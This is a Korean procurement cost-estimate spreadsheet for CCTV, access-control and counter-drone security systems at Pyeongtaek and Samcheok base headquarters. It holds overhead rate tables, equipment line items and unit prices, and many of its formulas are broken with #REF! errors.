Workbook
Name ___aab42: #REF!
Name ___aab42: #REF!
Name ___aab42: #REF!
Name ___aab42: #REF!
Name ___aab42: #REF!
Name ___BXP1: #REF!
Name ___BXP1: #REF!
Name ___BXP1: #REF!
Name ___BXP1: #REF!
Name ___BXP1: #REF!
Name ___CAD15: #REF!
Name ___CAD15: #REF!
Name ___CAD15: #REF!
Name ___CAD15: #REF!
Name ___CAD15: #REF!
Name ___CAD25: #REF!
Name ___CAD25: #REF!
Name ___CAD25: #REF!
Name ___CAD25: #REF!
Name ___CAD25: #REF!
Name ___CNP1: #REF!
Name ___CNP1: #REF!
Name ___CNP1: #REF!
Name ___CNP1: #REF!
Name ___CNP1: #REF!
Name ___CON135: #REF!
Name ___CON135: #REF!
Name ___CON135: #REF!
Name ___CON135: #REF!
Name ___CON135: #REF!
Name ___CON210: #REF!
Name ___CON210: #REF!
Name ___CON210: #REF!
Name ___CON210: #REF!
Name ___CON210: #REF!
Name ___CON240: #REF!
Name ___CON240: #REF!
Name ___CON240: #REF!
Name ___CON240: #REF!
Name ___CON240: #REF!
Name ___ELL1: #REF!
Name ___ELL1: #REF!
Name ___ELL1: #REF!
Name ___ELL1: #REF!
Name ___ELL1: #REF!
Name ___ELL2: #REF!
Name ___ELL2: #REF!
Name ___ELL2: #REF!
Name ___ELL2: #REF!
Name ___ELL2: #REF!
Name ___GJP1: #REF!
Name ___GJP1: #REF!
Name ___GJP1: #REF!
Name ___GJP1: #REF!
Name ___GJP1: #REF!
Name ___HPP1: #REF!
Name ___HPP1: #REF!
Name ___HPP1: #REF!
Name ___HPP1: #REF!
Name ___HPP1: #REF!

Sheet ------

Sheet 0000000

Sheet 표지
A6: - 목 차 -
D11: `18년 공급관리소 보안시스템 구매
F14: A. 공 사 비 집 계 표
F16: B. 공 사 비 내 역 서
F18: C. 물 량 산 출 서
F20: D. 노 임 단 가 표
F22: E. 일 위 대 가 표
F24: F. 단 가 비 교 표
A51: A. 공 사 비 집 계 표
A71: B. 공 사 비 내 역 서
A91: C. 물 량 산 출 서
A104: 목 차
D108: 1. | E108: 물량산출 근거표
D110: 2. | E110: 감시영상설비 CCTV SYSTEM 외곽 및 내부보안 산출
D112: 3. | E112: 감시영상설비 산출 (통합 본관동)
D114: 4. | E114: 감시영상설비 산출 (변전소)
D116: 5. | E116: 감시영상설비 산출 (정문 경비동)
D118: 6. | E118: 차량통제 시스템 산출
D120: 7. | E120: 출입자 통제 시스템 산출(통합 본관동)
D122: 8. | E122: 출입자 통제 시스템 산출(정문 경비동)
D124: 9. | E124: 출입자 통제 시스템 산출(초소)
D126: 10. | E126: 출입자 통제 시스템 산출(소방서)
D128: C1. | E128: 공구손료 할증 산출서
D130: C2. | E130: 운반비 산출서
... D134: C4. | E134: 잡자재비 산출서
A154: 1. 물량산출 근거표
A174: 2. 감시영상설비 CCTV SYSTEM 외곽 및 내부보안 산출
A194: 3. 감시영상설비 산출 (통합 본관동)
A214: 4. 감시영상설비 산출 (변전소)
A234: 5. 감시영상설비 산출 (정문 경비동)
A254: 6. 차량통제 시스템 산출
A274: 7. 출입자 통제 시스템 산출(통합 본관동)
A294: 8. 출입자 통제 시스템 산출(정문 경비동)
A314: 9. 출입자 통제 시스템 산출(초소)
A334: 10. 출입자 통제 시스템 산출(소방서)
A354: C1.공구손료 할증 산출서
A374: C2.운반비 산출서
... A494: F. 단 가 비 교 표

Sheet 산출내역 총괄표
A1: 총괄표
A3: 구 분 | D3: 평택기지본부 | E3: 삼척기지본부 | F3: 최종 산출 금액(원)
A4: 기자재비
A5: 통합관제시스템 구축
A6: 설치 및 시운전비
A7: 공급가액
A8: 부가가치세
A9: 합 계 | D9: =+D7+D8 -> 0 | E9: =+E7+E8 -> 0 | F9: =+D9+E9 -> 0

Sheet 설치공사비 총괄
C1: 설치공사비 총괄표
F2: (단위 : 원, VAT별도)
C3: 구 분 | D3: 설치공사비 | F3: 총 합계
D4: 평택기지본부 | E4: 삼척기지본부
C5: 재료비 | F5: =E5+D5 -> 0
C6: 노무비 | F6: =E6+D6 -> 0
C7: 경비 | F7: =E7+D7 -> 0
C8: 일반관리비 | F8: =E8+D8 -> 0
C9: 이윤 | F9: =E9+D9 -> 0
C10: 합 계 (천원미만 절사) | D10: =ROUNDDOWN(SUM(D5:D9),-3) -> 0 | E10: =ROUNDDOWN(SUM(E5:E9),-3) -> 0 | F10: =E10+D10 -> 0

Sheet 설치공사비(종합)
A1: 설치공사비 내역(종합)
G2: 재료비 | H2: 노무비(설치) | I2: 기자재비
E3: (단위 : 원, VAT 별도) | G3: ='견적 상세내역(기자재비, 노무비)'!H18+'견적 상세내역(기자재비, 노무비)'!#REF!+'견적 상세내역(기자재비, 노무비)'!#REF!+'견적 상세내역(기자재비, 노무비)'!#REF! -> #REF! | H3: ='견적 상세내역(기자재비, 노무비)'!#REF! -> #REF! | I3: =SUM('견적 상세내역(기자재비, 노무비)'!H6:H17) -> 0
D4: 금 액 | E4: 산출근거 (원가요율표 참조) | F4: 적용요율 | G4: 적용사유
A6: 순 구 매 원 가 | B6: 재 료 비 | C6: 직접재료비 | D6: =+'설치공사비(평택)'!D6+'설치공사비(삼척)'!D6 -> 0
D7: ='설치공사비(평택)'!D7+'설치공사비(삼척)'!D7 -> 0
C8: 소 계 | D8: ='설치공사비(평택)'!D8+'설치공사비(삼척)'!D8 -> 0
B9: 노 무 비 | C9: 직접노무비 | D9: ='설치공사비(평택)'!D9+'설치공사비(삼척)'!D9 -> 0
C10: 간접노무비 | D10: ='설치공사비(평택)'!D10+'설치공사비(삼척)'!D10 -> 0 | E10: ="직접노무비 x " &F10& "%" -> 직접노무비 x 12.6% | F10: 12.6 | G10: 7~12개월
C11: 소 계 | D11: ='설치공사비(평택)'!D11+'설치공사비(삼척)'!D11 -> 0
B12: 경 비 | C12: 기타경비 | E12: ="(재료비 + 노무비) x " &F12& "%" -> (재료비 + 노무비) x 5.2% | F12: 5.2 | G12: 7~12개월
C13: 산재보험료 | E13: ="노무비 x " &F13& "%" -> 노무비 x 3.56% | F13: 3.56 | G13: 7등급 미만
C14: 고용보험료 | E14: ="노무비 x " &F14& "%" -> 노무비 x 1.01% | F14: 1.01
C15: 건강보험료 | E15: ="직접노무비 x " &F15& "%" -> 직접노무비 x 3.545% | F15: 3.545 | H15: ="직접노무비 x " &F15& "%" -> 직접노무비 x 3.545% | J15: 산업안전보건관리비
C16: 연금보험료 | E16: ="직접노무비 x " &F16& "%" -> 직접노무비 x 4.5% | F16: 4.5 | H16: ="직접노무비 x " &F16& "%" -> 직접노무비 x 4.5% | J16: (재료비+기자재비+직접노무비) x 요윺 + 기초액 | K16: =(G3+H3+I3)*F18%+H18 -> #REF!
C17: 노인장기요양보험료 | E17: ="건강보험료 x " &F17& "%" -> 건강보험료 x 13.14% | F17: 13.14 | H17: ="건강보험료 x " &F17& "%" -> 건강보험료 x 13.14% | J17: [(재료비+직접노무비) x 요율 + 기초액] x 1.2 | K17: =((G3+H3)*F18%+H18)*1.2 -> #REF!
C18: 산업안전보건관리비 | D18: 4299794 | E18: 총 공사비 기준 산정 후 본부별 요율로 산정 ([산업안전보건관리비 산정] 탭 참고) | F18: 1.59 | H18: 2450000
C19: 퇴직공제부금비 | D19: 765410 | E19: ="직접노무비 x " &F19& "%" -> 직접노무비 x 2.3% | F19: 2.3
C20: 소 계
B21: 일 반 관 리 비 | E21: ="(재료비 + 노무비 + 경비) x " &F21& "%" -> (재료비 + 노무비 + 경비) x 6% | F21: 6
B22: 이 윤 | E22: ="(노무비 + 경비 + 일반관리비) x 15%" -> (노무비 + 경비 + 일반관리비) x 15% | F22: 15
B23: 합 계 | E23: (재료비+노무비+경비+일반관리비+이윤)
A24: 합 계 | D24: ='설치공사비(평택)'!D24+'설치공사비(삼척)'!D24 -> 5064000 | E24: 천원미만 절사
A25: 합계(V A T 포 함) | D25: ='설치공사비(평택)'!D25+'설치공사비(삼척)'!D25 -> 5570400
D27: `

Sheet 설치공사비(평택)
A1: 설치공사비 내역(평택기지본부)
G2: 재료비 | H2: 노무비(설치) | I2: 기자재비
E3: (단위 : 원, VAT 별도) | G3: ='견적 상세내역(기자재비, 노무비)'!H18+'견적 상세내역(기자재비, 노무비)'!#REF!+'견적 상세내역(기자재비, 노무비)'!#REF!+'견적 상세내역(기자재비, 노무비)'!#REF! -> #REF! | H3: ='견적 상세내역(기자재비, 노무비)'!#REF! -> #REF! | I3: 2061800000
D4: 금 액 | E4: 산출근거 (원가요율표 참조) | F4: 적용요율 | G4: 적용사유
A6: 순 구 매 원 가 | B6: 재 료 비 | C6: 직접재료비
C8: 소 계 | D8: =SUM(D6:D7) -> 0
B9: 노 무 비 | C9: 직접노무비
C10: 간접노무비 | E10: ="직접노무비 x " &F10& "%" -> 직접노무비 x 14.7% | F10: 14.7 | G10: 6개월 이하
C11: 소 계 | D11: =SUM(D9:D10) -> 0
B12: 경 비 | C12: 기타경비 | E12: ="(재료비 + 노무비) x " &F12& "%" -> (재료비 + 노무비) x 4.7% | F12: 4.7 | G12: 6개월 이하
C13: 산재보험료 | E13: ="노무비 x " &F13& "%" -> 노무비 x 3.56% | F13: 3.56
C14: 고용보험료 | E14: ="노무비 x " &F14& "%" -> 노무비 x 1.01% | F14: 1.01 | G14: 7등급 미만
C15: 건강보험료 | D15: - | E15: ="직접노무비 x " &F15& "%" -> 직접노무비 x % | G15: 1개월미만 공사 | H15: ="직접노무비 x " &F15& "%" -> 직접노무비 x % | J15: 산업안전보건관리비
C16: 연금보험료 | D16: - | E16: ="직접노무비 x " &F16& "%" -> 직접노무비 x % | G16: 1개월미만 공사 | H16: ="직접노무비 x " &F16& "%" -> 직접노무비 x % | J16: (재료비+기자재비+직접노무비) x 요윺 + 기초액 | K16: =(G3+H3+I3)*F18%+H18 -> #REF!
C17: 노인장기요양보험료 | D17: - | E17: ="건강보험료 x " &F17& "%" -> 건강보험료 x 13.14% | F17: 13.14 | H17: ="건강보험료 x " &F17& "%" -> 건강보험료 x 13.14% | J17: [(재료비+직접노무비) x 요율 + 기초액] x 1.2 | K17: =((G3+H3)*F18%+H18)*1.2 -> #REF!
C18: 산업안전보건관리비 | D18: 2149897 | E18: ※산업안전보건관리비 산정시트 참조 | F18: 1.59 | H18: 2450000
C19: 퇴직공제부금비 | D19: 382705 | E19: ="직접노무비 x " &F19& "%" -> 직접노무비 x 2.3% | F19: 2.3
C20: 소 계 | D20: =SUM(D12:D19) -> 2532602
B21: 일 반 관 리 비 | E21: ="(재료비 + 노무비 + 경비) x " &F21& "%" -> (재료비 + 노무비 + 경비) x 5% | F21: 5
B22: 이 윤 | E22: ="(노무비 + 경비 + 일반관리비) x 15%" -> (노무비 + 경비 + 일반관리비) x 15% | F22: 15
B23: 합 계 | D23: =SUM(D8,D11,D20,D21,D22) -> 2532602 | E23: (재료비+노무비+경비+일반관리비+이윤)
A24: 합 계 | D24: =TRUNC(D23,-3) -> 2532000 | E24: 천원미만 절사
A25: 합계(V A T 포 함) | D25: =D24*1.1 -> 2785200
D27: `

Sheet 설치공사비(삼척)
A1: 설치공사비 내역(삼척기지본부)
G2: 재료비 | H2: 노무비(설치) | I2: 기자재비
E3: (단위 : 원, VAT 별도) | G3: =+D6 -> 0 | H3: =+D9 -> 0 | I3: 1228800000
D4: 금 액 | E4: 산출근거 (원가요율표 참조) | F4: 적용요율 | G4: 적용사유
A6: 순 구 매 원 가 | B6: 재 료 비 | C6: 직접재료비
C8: 소 계 | D8: =SUM(D6:D7) -> 0
B9: 노 무 비 | C9: 직접노무비
C10: 간접노무비 | E10: ="직접노무비 x " &F10& "%" -> 직접노무비 x 14.7% | F10: 14.7 | G10: 6개월 이하
C11: 소 계 | D11: =SUM(D9:D10) -> 0
B12: 경 비 | C12: 기타경비 | E12: ="(재료비 + 노무비) x " &F12& "%" -> (재료비 + 노무비) x 4.7% | F12: 4.7 | G12: 6개월 이하
C13: 산재보험료 | E13: ="노무비 x " &F13& "%" -> 노무비 x 3.56% | F13: 3.56
C14: 고용보험료 | E14: ="노무비 x " &F14& "%" -> 노무비 x 1.01% | F14: 1.01 | G14: 7등급 미만
C15: 건강보험료 | D15: - | E15: ="직접노무비 x " &F15& "%" -> 직접노무비 x % | G15: 1개월미만 공사 | H15: ="직접노무비 x " &F15& "%" -> 직접노무비 x % | J15: 산업안전보건관리비
C16: 연금보험료 | D16: - | E16: ="직접노무비 x " &F16& "%" -> 직접노무비 x % | G16: 1개월미만 공사 | H16: ="직접노무비 x " &F16& "%" -> 직접노무비 x % | J16: (재료비+기자재비+직접노무비) x 요윺 + 기초액 | K16: =(G3+H3+I3)*F18%+H18 -> 21987920
C17: 노인장기요양보험료 | D17: - | E17: ="건강보험료 x " &F17& "%" -> 건강보험료 x 13.14% | F17: 13.14 | H17: ="건강보험료 x " &F17& "%" -> 건강보험료 x 13.14% | J17: [(재료비+직접노무비) x 요율 + 기초액] x 1.2 | K17: =((G3+H3)*F18%+H18)*1.2 -> 2940000
C18: 산업안전보건관리비 | D18: 2149897 | E18: ※산업안전보건관리비 산정시트 참조 | F18: 1.59 | H18: 2450000
C19: 퇴직공제부금비 | D19: 382705 | E19: ="직접노무비 x " &F19& "%" -> 직접노무비 x 2.3% | F19: 2.3
C20: 소 계 | D20: =SUM(D12:D19) -> 2532602
B21: 일 반 관 리 비 | E21: ="(재료비 + 노무비 + 경비) x " &F21& "%" -> (재료비 + 노무비 + 경비) x 5% | F21: 5
B22: 이 윤 | E22: ="(노무비 + 경비 + 일반관리비) x 15%" -> (노무비 + 경비 + 일반관리비) x 15% | F22: 15
B23: 합 계 | D23: =SUM(D8,D11,D20,D21,D22) -> 2532602 | E23: (재료비+노무비+경비+일반관리비+이윤)
A24: 합 계 | D24: =TRUNC(D23,-3) -> 2532000 | E24: 천원미만 절사
A25: 합계(V A T 포 함) | D25: =D24*1.1 -> 2785200
D27: `

Sheet 견적 상세내역(기자재비, 노무비)
A1: 견 적 상 세 내 역
A3: 구분 | B3: 품목 | D3: 규격 | E3: 단위 | F3: 수량 | G3: 단가 | H3: 금액 | I3: (단위 : 원, VAT 별도)
A5: 평택 기지 본부 | B5: 대드론시스템 장비 설치
B6: 기자재비 | C6: 주파수 스캐너 | D6: - 3Km 이상 탐지 / 전방향 / 400MHz~6GHz | E6: EA | F6: 1 | H6: =+G6*F6 -> 0
C7: 탐지 레이더 | D7: - 3Km 이상 탐지 / X-band / 패널형 | E7: EA | F7: 4 | H7: =+G7*F7 -> 0
C8: 추적 카메라(EO/IR) | D8: - 주간 식별: 3Km / 야간 식별: 2Km, NVR 포함 | E8: EA | F8: 2 | H8: =+G8*F8 -> 0 | I8: (NVR장비 포함)
C9: 고정형 재머 | D9: - GNSS, ISM 차단 / 지향성 | E9: EA | F9: 2 | H9: =+G9*F9 -> 0
C10: 운용 서버 | D10: - 대드론시스템 관제용 서버(PC) | E10: EA | F10: 1 | H10: =+G10*F10 -> 0
C11: 모니터 | D11: - 42“ | E11: EA | F11: 2 | H11: =+G11*F11 -> 0
C12: 네트워크 장비 | D12: - 네트워크스위치 등 네트워크 장비 일체 | E12: SET | F12: 1 | H12: =+G12*F12 -> 0
C13: 랙 | D13: - 19“ | E13: EA | F13: 1 | H13: =+G13*F13 -> 0
C14: 시간 동기화 서버 | D14: - GPS 시간 수신 및 시간 동기화 | E14: EA | F14: 1 | H14: =+G14*F14 -> 0
C15: UPS | D15: - 비상시 전력 유지 장비 | E15: EA | F15: 1 | H15: =+G15*F15 -> 0
C16: 단방향 통신장비 | D16: - 권역화 대상 타기관 시스템 화면 연계용 장비 | E16: EA | F16: 1 | H16: =+G16*F16 -> 0
C17: 단방향 통신장비 모니터 | D17: - 42“ | E17: EA | F17: 1 | H17: =+G17*F17 -> 0
B18: 설치공사 | D18: - 케이블 설치, 부자재, 기타 경비 등 | E18: SET | F18: 1 | H18: =+G18*F18 -> 0
B19: (소 계) | H19: =SUM(H6:H18) -> 0
B20: 통합관제시스템 구축(커스터마이징)
B21: 대드론 시스템 통합관제시스템 구축 | D21: SW(설치 지역, 장비에 맞는 연계 프로그램 구축) | E21: EA | F21: 1 | H21: =G21*F21 -> 0
B22: (소 계) | H22: =H21 -> 0
B23: ( 합 계 ) | H23: =SUM(H19,H22) -> 0
A24: 삼척 기지 본부 | B24: 대드론시스템 장비 설치
B25: 기자재 | C25: 주파수 스캐너 | D25: - 3Km 이상 탐지 / 전방향 / 400MHz~6GHz | E25: EA | F25: 1 | H25: =+G25*F25 -> 0
C26: 탐지 레이더 | D26: - 3Km 이상 탐지 / X-band / 패널형 | E26: EA | F26: 2 | H26: =+G26*F26 -> 0
C27: 추적 카메라(EO/IR) | D27: - 주간 식별: 3Km / 야간 식별: 2Km, NVR 포함 | E27: EA | F27: 1 | H27: =+G27*F27 -> 0 | I27: (NVR장비 포함)
C28: 고정형 재머 | D28: - GNSS, ISM 차단 / 지향성 | E28: EA | F28: 1 | H28: =+G28*F28 -> 0
C29: 운용 서버 | D29: - 대드론시스템 관제용 서버(PC) | E29: EA | F29: 1 | H29: =+G29*F29 -> 0
C30: 모니터 | D30: - 42“ | E30: EA | F30: 2 | H30: =+G30*F30 -> 0
C31: 네트워크 장비 | D31: - 네트워크스위치 등 네트워크 장비 일체 | E31: EA | F31: 1 | H31: =+G31*F31 -> 0
C32: 랙 | D32: - 19“ | E32: EA | F32: 1 | H32: =+G32*F32 -> 0
C33: 시간 동기화 서버 | D33: - GPS 시간 수신 및 시간 동기화 | E33: EA | F33: 1 | H33: =+G33*F33 -> 0
C34: UPS | D34: - 비상시 전력 유지 장비 | E34: EA | F34: 1 | H34: =+G34*F34 -> 0
C35: 단방향 통신장비 | D35: - 권역화 대상 타기관 시스템 화면 연계용 장비 | E35: EA | F35: 1 | H35: =+G35*F35 -> 0
C36: 단방향 통신장비 모니터 | D36: - 42“ | E36: EA | F36: 1 | H36: =+G36*F36 -> 0
B37: 설치공사 | D37: - 케이블 설치, 부자재, 기타 경비 등 | E37: SET | F37: 1 | H37: =+G37*F37 -> 0
B38: (소 계) | H38: =SUM(H25:H37) -> 0
B39: 통합관제시스템 구축(커스터마이징)
B40: 대드론 시스템 통합관제시스템 구축 | D40: SW(설치 지역, 장비에 맞는 연계 프로그램 구축) | E40: EA | F40: 1 | H40: =G40*F40 -> 0
B41: (소 계) | H41: =+H40 -> 0
B42: ( 소 계 ) | H42: =SUM(H38,H41) -> 0

Sheet 건축제비율(26.1.1.)
A1: ※ 적용시기 : 2026. 01. 01. 기초금액 발표분부터 | AK1: 2026년 건축∙산업환경설비공사 원가계산 간접공사비(제비율) 적용기준 (참고: 간접노무비율, 기타경비율, 일반관리비율, 이윤율, 공사이행보증수수료율은 조달청 분석요율임)
AB2: [간접노무비] | AK2: [기타경비] | BD2: [일반관리비] | BQ2: [이윤] | BX2: [건설기계대여대금 지급보증액 발급금액] | DI2: [산업안전보건관리비]
A6: 공사규모 | L6: 공사기간 | AB6: (직노) x 율 | AK6: (재+노) x 율 | AT6: 공사규모 | BD6: (재+노+경) x 율 | BQ6: (노+경+일) x 율 | BX6: (직접공사비) x 율 | DI6: □ 도급자관급 미포함 공사 | DZ6: (재+직노) x 율 + 기초액
A8: (직접공사비) | AB8: 건축 | AG8: 산업 설비 (건축) | AK8: 건축 | AP8: 산업 설비 (건축) | AT8: (추정가격) | BD8: 건축, 산업설비(건축) | BJ8: 전문· 전기·통신· 소방·기타
BX10: 종합건설업 | CL10: 전문건설업 | DI10: □ 도급자관급 포함 공사 | DZ10: (재+직노+도급자관급) x 요율주2) + 기초액과
DZ12: [(재+직노) x 요율주3) + 기초액] x 1.2 중에 작은 금액
A14: 10억 미만 | L14: 6개월 이하 (183일) | AB14: 15 | AG14: =AB14 -> 15 | AK14: 4.6 | AP14: =AK14 -> 4.6 | AT14: 5억 미만 | BD14: 8 | BJ14: 8 | BQ14: 15 | BX14: 구분 | CG14: 요율 | CL14: 구분 | DC14: 요율 | DI14: 산업안전보건관리비 대상액주1) | DZ14: 구분 | EQ14: 요율 | EY14: 기초액(천원)
L16: 7~12개월 (365일) | AB16: 15.2 | AG16: =AB16 -> 15.2 | AK16: 4.7 | AP16: =AK16 -> 4.7
L18: 13~36개월 (1095일) | AB18: 15.4 | AG18: =AB18 -> 15.4 | AK18: 5 | AP18: =AK18 -> 5 | BX18: 건축공사 | CG18: 0.07 | CL18: 비계·구조물해체공사 | DC18: 0.68 | DI18: 5억 미만 | DZ18: 건축공사 | EQ18: 3.11
L20: 36개월 초과 (1096일) | AB20: 16.2 | AG20: =AB20 -> 16.2 | AK20: 5.5 | AP20: =AK20 -> 5.5 | AT20: 5억 - 30억 미만 | BJ20: 6.5 | DZ20: 토목공사 | EQ20: 3.15
A22: 10억 - 50억 미만 | L22: 6개월 이하 (183일) | AB22: 14.7 | AG22: =AB22 -> 14.7 | AK22: 4.7 | AP22: =AK22 -> 4.7 | DZ22: 중건설공사 | EQ22: 3.64
L24: 7~12개월 (365일) | AB24: 14.9 | AG24: =AB24 -> 14.9 | AK24: 4.8 | AP24: =AK24 -> 4.8 | DZ24: 특수건설공사 | EQ24: 2.07
L26: 13~36개월 (1095일) | AB26: 15.1 | AG26: =AB26 -> 15.1 | AK26: 5.1 | AP26: =AK26 -> 5.1 | AT26: 30억 - 50억 미만 | BJ26: 5 | CL26: 석공사, 시설물유지관리, 철근콘크리트공사, 가스시설공사(1종) | DC26: 0.32 | DI26: 5억 ~ 50억 미만 | DZ26: 건축공사 | EQ26: 2.28 | EY26: 4325
L28: 36개월 초과 (1096일) | AB28: 16 | AG28: =AB28 -> 16 | AK28: 5.6 | AP28: =AK28 -> 5.6 | DZ28: 토목공사 | EQ28: 2.53 | EY28: 3300
A30: 50억 - 300억 미만 | L30: 6개월 이하 (183일) | AB30: 14.8 | AG30: =AB30 -> 14.8 | AK30: 5.1 | AP30: =AK30 -> 5.1 | DZ30: 중건설공사 | EQ30: 3.05 | EY30: 2975
L32: 7~12개월 (365일) | AB32: 15 | AG32: =AB32 -> 15 | AK32: 5.2 | AP32: =AK32 -> 5.2 | AT32: 50억 - 100억 미만 | BD32: 6.5 | BQ32: 12 | DZ32: 특수건설공사 | EQ32: 1.59 | EY32: 2450
L34: 13~36개월 (1095일) | AB34: 15.2 | AG34: =AB34 -> 15.2 | AK34: 5.5 | AP34: =AK34 -> 5.5 | BX34: 산업∙설비공사 | CG34: 0.16 | CL34: 도장공사, 철강재설치공사 | DC34: 0.16 | DI34: 50억 이상 | DP34: 추정금액 800억 미만 건설공사 | DZ34: 건축공사 | EQ34: 2.37
L36: 36개월 초과 (1096일) | AB36: 16 | AG36: =AB36 -> 16 | AK36: 6.1 | AP36: =AK36 -> 6.1 | DZ36: 토목공사 | EQ36: 2.6
A38: 300억 - 1000억 미만 | L38: 6개월 이하 (183일) | AB38: 14.3 | AG38: =AB38 -> 14.3 | AK38: 5.3 | AP38: =AK38 -> 5.3 | AT38: 100억 - 300억 미만 | BJ38: 4.5 | DZ38: 중건설공사 | EQ38: 3.11
L40: 7~12개월 (365일) | AB40: 14.5 | AG40: =AB40 -> 14.5 | AK40: 5.4 | AP40: =AK40 -> 5.4 | DZ40: 특수건설공사 | EQ40: 1.64
CL41: 기계설비공사업 및 그 외 | DC41: 0.1
L42: 13~36개월 (1095일) | AB42: 14.7 | AG42: =AB42 -> 14.7 | AK42: 5.7 | AP42: =AK42 -> 5.7 | DP42: 추정금액 800억 이상 건설공사 | DZ42: 건축공사 | EQ42: 2.64
L44: 36개월 초과 (1096일) | AB44: 15.6 | AG44: =AB44 -> 15.6 | AK44: 6.2 | AP44: =AK44 -> 6.2 | AT44: 300억 - 1000억 미만 | BD44: 5 | BQ44: 10 | DZ44: 토목공사 | EQ44: 2.73
A46: 1000억 이상 | L46: 6개월 이하 (183일) | AB46: 14.2 | AG46: =AB46 -> 14.2 | AK46: 5.6 | AP46: =AK46 -> 5.6 | DZ46: 중건설공사 | EQ46: 3.39
L48: 7~12개월 (365일) | AB48: 14.4 | AG48: =AB48 -> 14.4 | AK48: 5.7 | AP48: =AK48 -> 5.7 | BX48: * 적용제외: 국가유산수리공사, 전기, 정보통신, 소방시설 | DZ48: 특수건설공사 | EQ48: 1.78
L50: 13~36개월 (1095일) | AB50: 14.6 | AG50: =AB50 -> 14.6 | AK50: 6 | AP50: =AK50 -> 6 | AT50: 1000억 이상 | BD50: 4.5 | BQ50: 9 | BX50: ※ 건설기계대여대금 지급보증서 발급금액 및 업종별 건설기계 | DI50: * 총 공사금액(도급금액+도급자설치 관급금액) 2천만원 이상 건설공사
L52: 36개월 초과 (1096일) | AB52: 15.5 | AG52: =AB52 -> 15.5 | AK52: 6.5 | AP52: =AK52 -> 6.5 | BX52: 투입비율 산정기준(국토부 고시 제2019-286호, 2019.6.19.) | DI52: 주1) 산업안전보건관리비 대상액
A54: * 기타경비항목: 수도광열비, 복리후생비, 소모품비 및 사무용품비, 여비∙교통∙통신비, 세금과공과, 도서인쇄비
DI55: - 재료비+직접노무비+도급자설치 관급금액
A56: □ 산업설비(건축) 해당공종 : 지열공사, 소각시설 등
A58: [고용보험료] | AT58: [건강보험료] | BB58: [노인장기요양보험료] | BP58: [연금보험료] | BX58: [산재보험료] | DI58: 주2) 대상액이 재료비, 직접노무비, 도급자관급의 합계금액인 요율
DI61: 주3) 대상액이 재료비, 직접노무비의 합계금액인 요율
A62: (노) x 율 | AT62: (직노) x 3.595 | BB62: (건강보험료) x 13.14 | BP62: (직노) x 4.75 | BX62: (노) x 3.56
A64: 공사배정규모(추정금액) | AG64: 요율 | AT64: * 공사기간 1개월(30일) 이상인 모든 건설공사 | BX64: * 모든 건설공사 적용. 노동부 고시 제2024-77호(2024. 12. 30.), 산업재해보상보험법시행령 | DI64: * 산업안전보건관리비 산출 건설공사의 종류
A66: [1등급] 1200억 이상 | AG66: 1.57 | AT66: (노인장기요양보험료는 소수점 다섯째자리에서 반올림)
DI67: - [건축공사] 「건설산업기본법 시행령」 (별표 1) 제1호 '나'목 / 제2호의 전문공사로서 건축물과
A68: [2등급] 800억 ~ 1200억 미만 | AG68: 1.30 | AT68: ※ 사회보험의 보험료 적용기준 (국토부 고시 제2021-905호, 2021.7.1.) | BX68: ※ 사회보험의 보험료 적용기준 (국토부 고시 제2021-905호, 2021.7.1.)
A70: [3등급] 520억 ~ 800억 미만 | AG70: 1.13 | AT70: [환경보전비] | BX70: [건설하도급대금지급보증서발급수수료] | DI70: 관련하여 분리하여 발주되었고 시간적·장소적으로도 독립하여 행하는 공사
A72: [4등급] 340억 ~ 520억 미만 | AG72: 1.06
DI73: - [토목공사] 「건설산업기본법 시행령」 (별표 1) 제1호 '가'목, '라'목 / 제2호의 전문공사로서
...

Sheet 관리소별 세부산출내역서-전북 (단가계산)
A1: 관리소별 세부 산출내역서
R3: (단위 : 원, VAT 별도)
A4: 구분 | B4: 품목 | C4: 규격 | D4: 단위 | E4: 수량 | F4: 재료비 견적가 | H4: 간접비 단가 | I4: 단가 합계 | J4: 간접비 | K4: 재료비 견적가 + 간접비 | L4: 노무비 설계가 | N4: 간접비 단가 | O4: 단가 합계 | P4: 간접비 | Q4: 노무비 설계가 + 간접비 | R4: 비고
F5: 단가 | G5: 금액 | L5: 단가 | M5: 금액
A6: 고암BV | B6: [제 1호] 영상처리장치(기타설비 포함)
B7: IP Speed Dome 카메라 | C7: PTZ, 실외형, TTA 인증제품 | D7: EA | E7: 2 | F7: 5700000 | G7: =E7*F7 -> 11400000 | L7: =#REF! -> #REF! | M7: =E7*L7 -> #REF!
B8: IP Speed Dome 카메라 | C8: SPEED DOME, 실내형, TTA 인증제품 | D8: EA | E8: 1 | F8: 3600000 | G8: =E8*F8 -> 3600000 | L8: =#REF! -> #REF! | M8: =E8*L8 -> #REF!
B9: IP Bullet 카메라 | C9: Bullet, 고정형, PANEL용 | D9: EA | E9: 0 | F9: 0 | G9: =E9*F9 -> 0 | L9: 0 | M9: =E9*L9 -> 0
B10: 네트워크 스피커 | C10: HORN TYPE, 30W 이하 | D10: EA | E10: 1 | F10: 1200000 | G10: =E10*F10 -> 1200000 | L10: =#REF! -> #REF! | M10: =E10*L10 -> #REF!
B11: 오디오 앰프 | C11: 네트워크용 | D11: EA | E11: 0 | F11: 0 | G11: =E11*F11 -> 0 | L11: 0 | M11: =E11*L11 -> 0
B12: 영상처리장치 | C12: HDD 18TB 이상 | D12: EA | E12: 1 | F12: 18000000 | G12: =E12*F12 -> 18000000 | L12: =#REF! -> #REF! | M12: =E12*L12 -> #REF!
B13: 인터폰 | C13: 양방향 통화기능 | D13: EA | E13: 1 | F13: 2800000 | G13: =E13*F13 -> 2800000 | L13: =#REF! -> #REF! | M13: =E13*L13 -> #REF!
B14: DOOR LOCK | C14: 정문개폐기용 | D14: EA | E14: 1 | F14: 300000 | G14: =E14*F14 -> 300000 | L14: =#REF! -> #REF! | M14: =E14*L14 -> #REF!
B15: 카메라용 함체 | C15: W550ⅹH450ⅹD200, SUS 304 1.2T | D15: EA | E15: 2 | F15: 870000 | G15: =E15*F15 -> 1740000 | L15: =#REF! -> #REF! | M15: =E15*L15 -> #REF!
B16: CCTV 폴대 | C16: 6M Pole(SUS 304), CCTV용(가드포함) | D16: EA | E16: 2 | F16: 2300000 | G16: =E16*F16 -> 4600000 | L16: =#REF! -> #REF! | M16: =E16*L16 -> #REF!
B17: 19" RACK | C17: 잠금장치, FAN 포함 | D17: SET | E17: 1 | F17: 1200000 | G17: =E17*F17 -> 1200000 | L17: =#REF! -> #REF! | M17: =E17*L17 -> #REF!
B18: 스위칭 허브 | C18: AC 220V, L2 적용 | D18: EA | E18: 1 | F18: 1500000 | G18: =E18*F18 -> 1500000 | L18: =#REF! -> #REF! | M18: =E18*L18 -> #REF!
